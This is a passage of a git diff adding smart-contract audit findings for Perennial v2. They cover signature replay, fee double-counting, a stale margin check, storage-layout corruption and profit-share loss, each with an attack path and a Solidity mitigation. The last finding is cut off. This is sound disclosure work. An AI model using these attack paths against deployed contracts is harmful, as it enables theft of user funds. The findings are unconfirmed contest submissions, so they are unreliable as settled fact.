updateContext.guaranteeGlobal.add(newGuarantee); + updateContext.guaranteeLocal.add(newGuarantee); + + + // update collateral + context.local.update(newOrder.collateral); + + + // protect account + if (newOrder.protected()) updateContext.liquidator = msg.sender; + + + // apply referrer + _processReferrer(updateContext, newOrder, newGuarantee, orderReferrer, guaranteeReferrer); + + + // request version, only request new price on non-empty market order + if (!newOrder.isEmpty() && newGuarantee.isEmpty()) oracle.request(IMarket(this), 
context.account); + + + // after + InvariantLib.validate(context, updateContext, newOrder, newGuarantee); + + + // store + _storeUpdateContext(context, updateContext); + + + // fund + if (newOrder.collateral.sign() == 1) token.pull(msg.sender, UFixed18Lib.from(newOrder.collateral.abs())); + if (newOrder.collateral.sign() == -1) token.push(msg.sender, UFixed18Lib.from(newOrder.collateral.abs())); + + + // events + } + +When a new order is submitted (via _update), both the global (context.latestPositionGlobal) and local (context.latestPositionLocal) positions are immediately updated with the order’s amounts (e.g., maker, long, short). + +Example: A user opens a long position of +100. The global/long position increases by 100 instantly. + +The order is added to pendingGlobal/pendingLocal to await settlement. + +During settlement (_processOrderGlobal/_processOrderLocal), the code checks if the oracle version associated with the order is valid: + +if (!oracleVersion.valid) newOrder.invalidate(newGuarantee); +If invalid, the order is "invalidated" (its amounts are zeroed out). + +The invalidated order (now zeroed) is subtracted from the pending aggregate: + +context.pendingGlobal.sub(newOrder); // Subtracts zero +Position Not Reverted: + +The global/local positions (context.latestPositionGlobal/context.latestPositionLocal) remain updated with the original (now invalid) order amounts. + +The positions are never rolled back to their pre-order state. + + + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +A user submits an order increasing their position by X. + +The pending and current positions are updated to include X. + +Settlement finds the oracle version invalid, invalidates the order (sets amounts to zero), subtracts the pending, but doesn't revert the position. + +The user's position remains increased by X, despite the order being invalid, leading to incorrect accounting. 
+ +### Impact + +This allows invalid orders to permanently alter positions, leading to incorrect collateral requirements, exposure calculations, and potential financial exploitation. + +### PoC + +_No response_ + +### Mitigation + +When invalidating an order during settlement, revert the position changes made when the order was initially added. This can be done by subtracting the original order amounts from the current positions during invalidation. + +Only update positions after an order is validated during settlement, not when it’s initially placed. \ No newline at end of file diff --git a/015.md b/015.md new file mode 100644 index 0000000..a79d4b0 --- /dev/null +++ b/015.md @@ -0,0 +1,100 @@ +Mammoth Mocha Koala + +Medium + +# Missing Domain-Caller Validation + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Verifier.sol#L42C5-L52C1 + +The Verifier contract fails to enforce that a signed message’s domain field (if set) matches the address of the contract calling the verification function (msg.sender). This allows signatures intended for one context (e.g., a specific market) to be replayed in unintended contexts (e.g., a different market), violating domain isolation and enabling signature reuse across domains + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Verifier.sol#L42C5-L52C1 + + function verifyFill(Fill calldata fill, bytes calldata signature) + external + validateAndCancel(fill.common, signature) + { + if (!SignatureChecker.isValidSignatureNow( + fill.common.signer, + _hashTypedDataV4(FillLib.hash(fill)), + signature + )) revert VerifierInvalidSignerError(); + } + + + +EIP-712 signatures include a domain separator to cryptographically bind a signature to a specific context (e.g., a specific contract or "domain"). This prevents replaying signatures across different contexts. 
+ +In the Verifier contract, messages like Fill, Intent, or Take include a common.domain field. If set, this domain should restrict the message’s validity to only the specified contract (e.g., a market address). + + +The Verifier contract does not validate that msg.sender matches common.domain during signature verification. For example: + + +function verifyFill(Fill calldata fill, bytes calldata signature) + external + validateAndCancel(fill.common, signature) +{ + // No check that `msg.sender == fill.common.domain` + if (!SignatureChecker.isValidSignatureNow(...)) revert(...); +} +This allows a malicious actor to submit a message with domain = Market A to Market B, bypassing the intended domain isolation. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +Valid Signature for Market A: + +A user signs a Fill message with domain = Market A. + +The message is intended to execute a trade only in Market A. + +Replay Attack on Market B: + +An attacker calls Verifier.verifyFill(fillMessage, signature) from Market B (not Market A). + +The Verifier approves the signature because it does not check if msg.sender == fill.common.domain. + +Unauthorized Execution: + +Market B processes the fill intended for Market A, leading to unintended trades, liquidity manipulation, or financial loss. + +### Impact + +Attackers can reuse signatures in unintended contexts (e.g., different markets). +Valid signatures meant for one domain can execute actions in another domain, violating trust boundaries. 
+ +### PoC + +_No response_ + +### Mitigation + +Add a check to enforce that msg.sender matches the common.domain (if the domain is set): + +modifier validateDomain(Common calldata common) { + if (common.domain != address(0) && common.domain != msg.sender) { + revert VerifierInvalidDomainError(); + } + _; +} + +// Apply modifier to verification functions: +function verifyFill(Fill calldata fill, bytes calldata signature) + external + validateDomain(fill.common) // + validateAndCancel(fill.common, signature) +{ + // ... +} \ No newline at end of file diff --git a/016.md b/016.md new file mode 100644 index 0000000..ad6ea2b --- /dev/null +++ b/016.md @@ -0,0 +1,115 @@ +Mammoth Mocha Koala + +Medium + +# Double Subtraction of Fees + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L57C1-L98C6 + +The Double Subtraction of Fees issue occurs when fees already accounted for in the previous checkpoint’s collateral balance are subtracted again when computing the next checkpoint’s collateral. This results in fees being deducted twice, artificially reducing the collateral balance. 
+ +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L57C1-L98C6 + +library CheckpointLib { + /// @notice Accumulate pnl and fees from the latest position to next position + /// @param order The next order + /// @param fromVersion The previous latest version + /// @param toVersion The next latest version + /// @return next The next checkpoint + /// @return response The accumulated pnl and fees + function accumulate( + IMarket.Context memory context, + IMarket.SettlementContext memory settlementContext, + uint256 orderId, + Order memory order, + Guarantee memory guarantee, + Version memory fromVersion, + Version memory toVersion + ) external returns (Checkpoint memory next, CheckpointAccumulationResponse memory) { + CheckpointAccumulationResult memory result; + + + // accumulate + result.collateral = _accumulateCollateral(context.latestPositionLocal, fromVersion, toVersion); + result.priceOverride = _accumulatePriceOverride(guarantee, toVersion); + (result.tradeFee, result.subtractiveFee, result.solverFee) = _accumulateFee(order, guarantee, toVersion); + result.offset = _accumulateOffset(order, guarantee, toVersion); + result.settlementFee = _accumulateSettlementFee(order, guarantee, toVersion); + result.liquidationFee = _accumulateLiquidationFee(order, toVersion); + + + // update checkpoint + next.collateral = settlementContext.latestCheckpoint.collateral + .sub(settlementContext.latestCheckpoint.tradeFee) // trade fee processed post settlement + .sub(Fixed6Lib.from(settlementContext.latestCheckpoint.settlementFee)); // settlement / liquidation fee processed post settlement + next.collateral = next.collateral + .add(settlementContext.latestCheckpoint.transfer) // deposit / withdrawal processed post settlement + .add(result.collateral) // incorporate collateral change at this settlement + .add(result.priceOverride); // incorporate price override pnl at this 
settlement + next.transfer = order.collateral; + next.tradeFee = Fixed6Lib.from(result.tradeFee).add(result.offset); + next.settlementFee = result.settlementFee.add(result.liquidationFee); + + + emit IMarket.AccountPositionProcessed(context.account, orderId, order, result); + + + return (next, _response(result)); + } + +Each checkpoint’s collateral value is intended to reflect the net balance after all prior fees (e.g., tradeFee, settlementFee) have been applied. + +For example, if the previous checkpoint’s collateral is 100 and a tradeFee of 10 was applied, the collateral in that checkpoint should already be 90 (i.e., 100 - 10). + +next.collateral = settlementContext.latestCheckpoint.collateral + .sub(settlementContext.latestCheckpoint.tradeFee) // ❌ Subtracts fees again + .sub(Fixed6Lib.from(settlementContext.latestCheckpoint.settlementFee)); // ❌ +Here, the code subtracts the previous checkpoint’s tradeFee and settlementFee from latestCheckpoint.collateral, which already includes these deductions from prior computations. This double-counts the fees. + +Example +Initial State: + +latestCheckpoint.collateral = 100 + +latestCheckpoint.tradeFee = 10 (already deducted to reach 100). + +Erroneous Calculation: + +next.collateral = 100 (previous collateral) - 10 (tradeFee) = 90. + +Result: Collateral becomes 90, but it should remain 100 (since the 10 fee was already subtracted in the prior checkpoint). + +Impact: + +Collateral is reduced by 10 again, leading to an incorrect balance of 90 instead of 100. + +Over time, this error compounds, disproportionately penalizing users by over-deducting fees. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Over time, this error compounds, disproportionately penalizing users by over-deducting fees. 
+ +### PoC + +_No response_ + +### Mitigation + +Remove the redundant subtraction of prior fees when computing next.collateral: + diff --git a/017.md b/017.md new file mode 100644 index 0000000..406c3ff --- /dev/null +++ b/017.md @@ -0,0 +1,167 @@ +Mammoth Mocha Koala + +Medium + +# Margin Check Uses Outdated Collateral Value + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19C5-L93C14 + +The Margin Check Uses Outdated Collateral Value issue occurs when the system verifies whether a position has sufficient collateral to remain solvent but uses the collateral value before applying changes from the new order. This allows users to withdraw collateral excessively, leaving the position undercollateralized after the update. + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L19C5-L93C14 + + function validate( + IMarket.Context memory context, + IMarket.UpdateContext memory updateContext, + Order memory newOrder, + Guarantee memory newGuarantee + ) external { + // emit created event first due to early return + emit IMarket.OrderCreated( + context.account, + newOrder, + newGuarantee, + updateContext.liquidator, + updateContext.orderReferrer, + updateContext.guaranteeReferrer + ); + + + if ( + context.pendingLocal.invalidation != 0 && // pending orders are partially invalidatable + context.pendingLocal.neg().gt(context.latestPositionLocal.magnitude()) // total pending close is greater than latest position + ) revert IMarket.MarketOverCloseError(); + + + if (newOrder.protected() && !_validateProtection(context, newOrder)) + revert IMarket.MarketInvalidProtectionError(); + + + if ( + !(context.latestPositionLocal.magnitude().isZero() && context.pendingLocal.isEmpty()) && // sender has no position + !(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO)) && // 
sender is depositing zero or more into account, without position change + ( + !context.latestOracleVersion.valid || + context.currentTimestamp - context.latestOracleVersion.timestamp >= context.riskParameter.staleAfter + ) // price is not stale + ) revert IMarket.MarketStalePriceError(); + + + if (context.marketParameter.closed && newOrder.increasesPosition()) + revert IMarket.MarketClosedError(); + + + if ( + updateContext.currentPositionGlobal.maker.gt(context.riskParameter.makerLimit) && + newOrder.increasesMaker() + ) revert IMarket.MarketMakerOverLimitError(); + + + if (!updateContext.currentPositionLocal.singleSided()) revert IMarket.MarketNotSingleSidedError(); + + + if ( + (!context.latestPositionLocal.maker.isZero() && !updateContext.currentPositionLocal.skew().isZero()) || + (!context.latestPositionLocal.skew().isZero() && !updateContext.currentPositionLocal.maker.isZero()) + ) revert IMarket.MarketNotSingleSidedError(); + + + if (context.pendingLocal.invalidation != 0 && context.pendingLocal.crossesZero()) + revert IMarket.MarketNotSingleSidedError(); + + + if (newGuarantee.priceDeviation(context.latestOracleVersion.price).gt(context.marketParameter.maxPriceDeviation)) + revert IMarket.MarketIntentPriceDeviationError(); + + + if (newOrder.protected()) return; // The following invariants do not apply to protected position updates (liquidations) + + + if ( + !updateContext.signer && // sender is relaying the account's signed intention + !updateContext.operator && // sender is operator approved for account + !(newOrder.isEmpty() && newOrder.collateral.gte(Fixed6Lib.ZERO)) // sender is depositing zero or more into account, without position change + ) revert IMarket.MarketOperatorNotAllowedError(); + + + if ( + context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal || + context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal + ) revert IMarket.MarketExceedsPendingIdLimitError(); + + + 
if ( + !PositionLib.margined( + updateContext.currentPositionLocal.magnitude(), + context.latestOracleVersion, + context.riskParameter, + updateContext.collateralization, + context.local.collateral.add(newGuarantee.priceAdjustment(context.latestOracleVersion.price)) // apply price override adjustment from intent if present + ) + +Margin Check Logic: + +The margin check ensures: + +PositionLib.margined( + updateContext.currentPositionLocal.magnitude(), + context.latestOracleVersion, + context.riskParameter, + updateContext.collateralization, + context.local.collateral.add(newGuarantee.priceAdjustment(...)) // ❌ Uses outdated collateral +) +Here, context.local.collateral is the collateral balance before applying newOrder.collateral (e.g., a withdrawal). + +newOrder.collateral represents a change (e.g., withdrawal) to the collateral balance. If this delta is not included in the margin check, the calculation uses an outdated value, ignoring the impact of the current order. + +Example Scenario +Initial State: + +Current collateral: 100 + +Required margin: 50 + +New order: Withdraw 80 collateral (newOrder.collateral = -80). + +Erroneous Check: + +The margin check uses context.local.collateral = 100 (pre-withdrawal value). + +Calculation: 100 ≥ 50 → check passes. + +Result: Collateral after withdrawal = 20 (insufficient for the required 50 margin). + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +The protocol allows withdrawals that should be blocked, risking insolvency. The position becomes undercollateralized, violating system invariants. 
+ + +### PoC + +_No response_ + +### Mitigation + +Include the newOrder.collateral delta in the margin check to use the updated collateral value: + + +// Corrected Code +context.local.collateral + .add(newOrder.collateral) // Include the collateral delta from the new order + .add(newGuarantee.priceAdjustment(...)) diff --git a/018.md b/018.md new file mode 100644 index 0000000..982ce80 --- /dev/null +++ b/018.md @@ -0,0 +1,92 @@ +Mammoth Mocha Koala + +Medium + +# Inverted Taker Fee Logic in from() + +### Summary + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Guarantee.sol#L63C5-L78C6 + +The from() function is intended to create a Guarantee from an Order, including determining whether a taker fee should be charged. However, the logic for setting takerFee is inverted, leading to incorrect fee exemptions. + +### Root Cause + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Guarantee.sol#L63C5-L78C6 + + function from( + Order memory order, + Fixed6 priceOverride, + UFixed6 solverReferralFee, + bool chargeTradeFee + ) internal pure returns (Guarantee memory newGuarantee) { + newGuarantee.orders = order.orders; + + + (newGuarantee.longPos, newGuarantee.longNeg, newGuarantee.shortPos, newGuarantee.shortNeg) = + (order.longPos, order.longNeg, order.shortPos, order.shortNeg); + newGuarantee.takerFee = chargeTradeFee ? UFixed6Lib.ZERO : order.takerTotal(); + + + newGuarantee.notional = taker(newGuarantee).mul(priceOverride); + newGuarantee.orderReferral = order.takerReferral; + newGuarantee.solverReferral = order.takerReferral.mul(solverReferralFee); + } + + +newGuarantee.takerFee = chargeTradeFee ? UFixed6Lib.ZERO : order.takerTotal(); // ❌ +chargeTradeFee: A boolean flag indicating whether the order should incur a taker fee. 
+ +Intended Behavior: + +If chargeTradeFee is true: The order should pay the fee (takerFee = order.takerTotal()). + +If chargeTradeFee is false: The order should be exempt (takerFee = 0). + +Actual Behavior: + +The code does the opposite: It sets takerFee to 0 when chargeTradeFee is true, and charges the fee when chargeTradeFee is false. + +Example +Order Parameters: + +chargeTradeFee = true (fee should apply). + +order.takerTotal() = 10 (fee amount). + +Result: + +takerFee = 0 (fee is waived despite chargeTradeFee being true). + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +The protocol loses expected revenue. + +Users bypass fees they should pay, violating system invariants. + +### PoC + +_No response_ + +### Mitigation + +Flip the ternary condition to align with the intended logic: + + +newGuarantee.takerFee = chargeTradeFee ? order.takerTotal() : UFixed6Lib.ZERO; // +Corrected Behavior +chargeTradeFee = true → Fee charged (takerFee = order.takerTotal()). + +chargeTradeFee = false → Fee exempt (takerFee = 0). \ No newline at end of file diff --git a/019.md b/019.md new file mode 100644 index 0000000..968b9ec --- /dev/null +++ b/019.md @@ -0,0 +1,91 @@ +Small Hazel Lemur + +Medium + +# Corrupted storage after upgrade in the contract + +### Summary + +Corrupted storage after upgrade in the contract + +### Root Cause + +from the commit differences we can see that +`uint256 invalidation;` +is not placed after all variables + +After the upgrade, the newly upgraded smart contract would be +reading from storage slots that contain data no longer corresponding to the new +storage layout. 
This would cause the system to break in an unpredictable manner, +depending on the number of storage slots added as part of the upgrade + +```solidity + /// @dev The invalidation status semaphore (local only) + /// (0 = no invalidation possible / intent only, 1+ = partially or fully invalidatable) + uint256 invalidation; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 makerReferral; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 takerReferral; +} +``` +[types/Order.sol#L46](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/0a9028e2d9f4b4821e11ce3b185f1b69a338b078/perennial-v2/packages/core/contracts/types/Order.sol#L46) + +![Online Image](https://i.ibb.co/k00vFMD/image.png) + +the same you can see at currenlty deployed version, takerReferral is the last: + +```solidity + /// @dev The negative skew short order size + UFixed6 shortNeg; + + /// @dev The protection status semaphore (local only) + uint256 protection; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 makerReferral; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 takerReferral; +} +``` +[0x17ebca0060c3e84812ab4e208cc33e5fd8a3b255#code#F51#L46](https://arbiscan.io/address/0x17ebca0060c3e84812ab4e208cc33e5fd8a3b255#code#F51#L46) +### Internal pre-conditions + +_No response_ + +### External pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +1) Corrupted storage of the Order contract. +2) System would break in an unpredictable manner. 
+similar issue was in [previous contest](https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-judging/issues/53) +### PoC + +_No response_ + +### Mitigation + +```diff + /// @dev The invalidation status semaphore (local only) + /// (0 = no invalidation possible / intent only, 1+ = partially or fully invalidatable) +- uint256 invalidation; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 makerReferral; + + /// @dev The referral fee multiplied by the size applicable to the referral + UFixed6 takerReferral; + ++ uint256 invalidation; +} +``` \ No newline at end of file diff --git a/020.md b/020.md new file mode 100644 index 0000000..b40d14f --- /dev/null +++ b/020.md @@ -0,0 +1,67 @@ +Small Hazel Lemur + +Medium + +# _ineligible() inside redemptionEligible is slightly miscalculated + +### Summary + +_ineligible() inside redemptionEligible is slightly miscalculated + +### Root Cause + +claimAmount doesn't equal claimAssets, so whenever eligible redemption is calculated to get +latest global assets before withdrawal, there should be addition of claimAssets, which is happening in +`context.global.update` before calling `_manage` + +```solidity + // asses socialization + UFixed6 claimAmount = _socialize(context, claimAssets); + + // update positions +-> context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.currentCheckpoint.update(depositAssets, redeemShares); + + // manage assets + asset.pull(msg.sender, UFixed18Lib.from(depositAssets)); +-> _manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); + asset.push(msg.sender, UFixed18Lib.from(claimAmount)); + +``` 
+[vault/contracts/Vault.sol#L463](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/0a9028e2d9f4b4821e11ce3b185f1b69a338b078/perennial-v2/packages/vault/contracts/Vault.sol#L463) + +similar to [issue before](https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-judging/issues/36) + +### Internal pre-conditions + +### External pre-conditions + +### Attack Path + +### Impact + +One of the main effects of _ineligible() is that this part cannot be used as an +asset to open a position; if this value is too small, too many positions are opened, +resulting in the inability to claimAssets properly. +### PoC + +### Mitigation +use claimAssets to get context.global.assets before withdrawal + +```diff +- function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { ++ function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance, UFixed6 claimAssets) private { + if (context.totalCollateral.lt(Fixed6Lib.ZERO)) return; + +- Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); ++ Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, claimAssets)); + + for (uint256 marketId; marketId < context.registrations.length; marketId++) + if (targets[marketId].collateral.lt(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); + for (uint256 marketId; marketId < context.registrations.length; marketId++) + if (targets[marketId].collateral.gte(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); + } +``` \ No newline at end of file diff --git a/021.md b/021.md new file mode 100644 index 0000000..727e50b --- /dev/null +++ b/021.md @@ -0,0 +1,22 @@ +Lucky Peach Barbel + +Medium + +# orders can be executed at incorrect timestamps, leading to mismatched market states and potential financial losses 
+
+The bug arises in the [_processOrderGlobal](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L860-L899) and [_processOrderLocal](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L905-L946) functions, where the contract fails to correctly handle pending orders whose timestamps fall between the current position's timestamp and the latest oracle version. Specifically, the contract incorrectly advances the order's timestamp to the latest oracle version if `newOrderTimestamp > newOrder.timestamp`, without considering whether the pending order's timestamp is within the valid range for processing. This logic flaw is demonstrated [in the following code snippet](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L872-L875):
+
+```solidity
+if (newOrderTimestamp > newOrder.timestamp) {
+ newOrder.next(newOrderTimestamp); // @audit Incorrectly advances the order
+ newGuarantee.next();
+}
+```
+
+For example, if the latest oracle version has a timestamp of `100`, the current position's timestamp is `90`, and a pending order has a timestamp of `95`, the contract will incorrectly advance the order to timestamp `100` instead of processing it at `95`. This results in orders being executed at incorrect timestamps, leading to mismatched market states and potential financial losses.
+
+### **Impact**
+Pending orders are processed at the wrong timestamps, causing discrepancies between the expected and actual state of the market. This can lead to financial losses for users due to missed opportunities.
+
+### **Mitigation**
+Modify the logic to ensure pending orders are processed at their correct timestamps by checking if `newOrderTimestamp` falls within the valid range between the current position's timestamp and the latest oracle version.
\ No newline at end of file diff --git a/022.md b/022.md new file mode 100644 index 0000000..c778abb --- /dev/null +++ b/022.md @@ -0,0 +1,105 @@ +Raspy Black Giraffe + +High + +# Vault and Market Contracts Will Cause Over-Leveraged Positions Affecting Vault Users + +### Summary + +The absence of risk parameter validation in both the Vault’s _retarget function and the Market contract’s update functions will cause vault users to suffer losses due to over-leveraged or under-collateralized positions. + +### Root Cause + +In [Vault.sol:_retarget](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/vault/contracts/Vault.sol#L479-L491): +The function directly calls market.update without validating target positions against the Market’s risk parameters (max leverage, position size, collateral requirements) +```solidity +function _retarget( + Registration memory registration, + Target memory target, + bool shouldRebalance +) private { + registration.market.update( + address(this), + shouldRebalance ? target.maker : Fixed6Lib.ZERO, + shouldRebalance ? 
target.taker : Fixed6Lib.ZERO, + target.collateral, + address(0) + ); +} +``` +In [Market.sol:update](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/core/contracts/Market.sol#L283-L315) functions: +The Market’s update functions lack explicit safeguards for risk parameters +```solidity +function update( + address account, + UFixed6 newMaker, + UFixed6 newLong, + UFixed6 newShort, + Fixed6 collateral, + bool protect, + address referrer +) public nonReentrant whenNotPaused { + // No visible checks for max leverage or collateral adequacy + Order memory newOrder = OrderLib.from(...); // Risk checks not confirmed + _updateAndStore(...); // Implementation hidden +} +``` + + + +### Internal Pre-conditions + +1- The Vault’s strategy (_strategy) generates target positions exceeding the Market’s risk limits. +2- The Market’s internal functions (_updateAndStore, OrderLib.from) fail to enforce RiskParameter constraints (e.g., maxLeverage, minCollateral). +3- The Market’s updateRiskParameter function does not retroactively validate existing positions. + +### External Pre-conditions + +1- The Market’s oracle provides volatile prices that exacerbate over-leveraged positions. + +### Attack Path + +1- The Vault’s strategy calculates a target position exceeding the Market’s maxLeverage (e.g., 10x leverage when the Market allows 5x). +2- The Vault calls _retarget, passing the invalid target to market.update. +3- The Market’s update function processes the request without validating against RiskParameter constraints. +4- The Market’s internal functions (e.g., _updateAndStore) fail to reject the over-leveraged position. +5- During market volatility, the position becomes under-collateralized and is liquidated, causing losses to vault users. + +### Impact + +Vault users suffer a complete loss of deposited assets due to forced liquidations or protocol insolvency. 
The Market may accumulate bad debt, destabilizing the entire protocol + +### PoC + +_No response_ + +### Mitigation + +1- Vault-Level Fix: Add explicit risk checks in _retarget before calling market.update : +```solidity +function _retarget(...) private { + // Fetch Market’s risk parameters + RiskParameter memory params = registration.market.riskParameter(); + + // Validate leverage + UFixed6 leverage = target.leverage(); // Calculate leverage based on position/collateral + require(leverage.lte(params.maxLeverage), "Vault: Over-leveraged"); + + // Validate collateral + require(target.collateral.gte(params.minCollateral), "Vault: Insufficient collateral"); + + // Proceed with update + registration.market.update(...); +} +``` +2- Market-Level Fix: Ensure internal functions (_updateAndStore, OrderLib.from) enforce risk parameters : +```solidity +// Inside Market.sol’s _updateAndStore: +function _updateAndStore(...) internal { + // Validate against RiskParameter + RiskParameter memory params = riskParameter(); + require(position.size().lte(params.maxPosition), "Market: Position too large"); + require(collateral.gte(params.minCollateral), "Market: Insufficient collateral"); + // ... +} +``` \ No newline at end of file diff --git a/023.md b/023.md new file mode 100644 index 0000000..e29b3af --- /dev/null +++ b/023.md @@ -0,0 +1,61 @@ +Raspy Black Giraffe + +High + +# The incorrect condition in liquidity checks will allow liquidity rule bypass for increasing taker orders + +### Summary + +A missing conditional check in liquidityChecks() will cause a bypass of liquidity rules for increasing taker orders as the function improperly applies liquidity checks under unintended scenarios. 
This inconsistency could lead to systemic risks in market stability. + +### Root Cause + +In [liquidityChecks()](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/a77aaa94d3b3a9725e4474428bc0a18ca2fde3b4/perennial-v2/packages/core/contracts/types/Order.sol#L234-L248) the condition: +```solidity +return !marketParameter.closed && + ((long(self).isZero() && short(self).isZero()) || increasesTaker(self)); +``` +includes increasesTaker(self) as a condition under which liquidity checks apply. This contradicts the intended behavior stated in the comment, which implies liquidity checks should not apply to increasing taker orders. + + +### Internal Pre-conditions + +1. The market must be open. +2. The order must either have no position changes +(long(self).isZero() && short(self).isZero() == true) + or be an increasing taker order +(increasesTaker(self) == true). + + +### External Pre-conditions + +_No response_ + +### Attack Path + +1. A user submits an increasing taker order. +2. The liquidityChecks() function evaluates the order. +3. Liquidity checks improperly apply (or fail to bypass) due to the inclusion of increasesTaker(self) in the condition. + +### Impact + +The protocol may allow invalid orders to bypass liquidity rules incorrectly. This could lead to: + +1. Collateral underfunding for increasing taker orders. +2. Systemic risk of market destabilization due to insufficient liquidity enforcement. + +Potential Loss: This depends on the volume and leverage of increasing taker orders. In a worst-case scenario, it could result in cascading liquidation events or insolvency. + +### PoC + +_No response_ + +### Mitigation + +To resolve this issue, revise the condition in liquidityChecks() to ensure increasing taker orders bypass liquidity checks when appropriate. 
For example: +```solidity +return !marketParameter.closed && + ((long(self).isZero() && short(self).isZero()) || !increasesTaker(self)); +``` \ No newline at end of file diff --git a/024.md b/024.md new file mode 100644 index 0000000..7363388 --- /dev/null +++ b/024.md @@ -0,0 +1,98 @@ +Rapid Slate Corgi + +High + +# Vault.settle(account=coordinator) will lose profitShares + +### Summary + +`Vault.settle()` turns a portion of the profit into `profitShares` for `coordinator`. +It uses the method `_credit()` to save `profitShares` to `storage`, but it doesn't update the memory variable `context.local.shares`. +It doesn't take into account the case where `account == coordinator`. +This way, if you maliciously specify that the settlement account is `coordinator`, `settle()` will end up overwriting the freshly stored value with the stale value held in memory. +This results in the loss of `profitShares`. + +### Root Cause + +[/Vault.sol#L390](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L390) +`settle()` calls `_credit()` +```solidity + function _settle(Context memory context, address account) private { +... 
+ while ( + context.global.current > context.global.latest && + context.latestTimestamp >= (nextCheckpoint = _checkpoints[context.global.latest + 1].read()).timestamp + ) { + // process checkpoint + UFixed6 profitShares; + (context.mark, profitShares) = nextCheckpoint.complete( + context.mark, + context.parameter, + _checkpointAtId(context, nextCheckpoint.timestamp) + ); + context.global.shares = context.global.shares.add(profitShares); +@=> _credit(coordinator, profitShares); +``` + +in [Vault.sol#L424](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L424) +save to storage but don't update `context.local.shares` +```solidity + function _credit(address account, UFixed6 shares) internal virtual { + Account memory local = _accounts[account].read(); + local.shares = local.shares.add(shares); +@=> _accounts[account].store(local); + } +``` + +but at the last `_saveContext()` save `context.local.shares` to storage, it will override `_credit()` value if account == coordinator +```solidity + function _saveContext(Context memory context, address account) private { +@=> if (account != address(0)) _accounts[account].store(context.local); + _accounts[address(0)].store(context.global); + _checkpoints[context.currentId].store(context.currentCheckpoint); + mark = context.mark; + } +``` + + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +Example context[coordinator].local.shares = 0 + +1. anyone call `settle(account = coordinator)` +2. suppose profitShares = 10 +3. in `_credit()` save storage `_accounts[coordinator].shares = profitShares = 10` , but `context.local.shares` still 0 +4. at last `_saveContext()` will overwrite `_accounts[coordinator].shares = context.local.shares = 0` +5. 
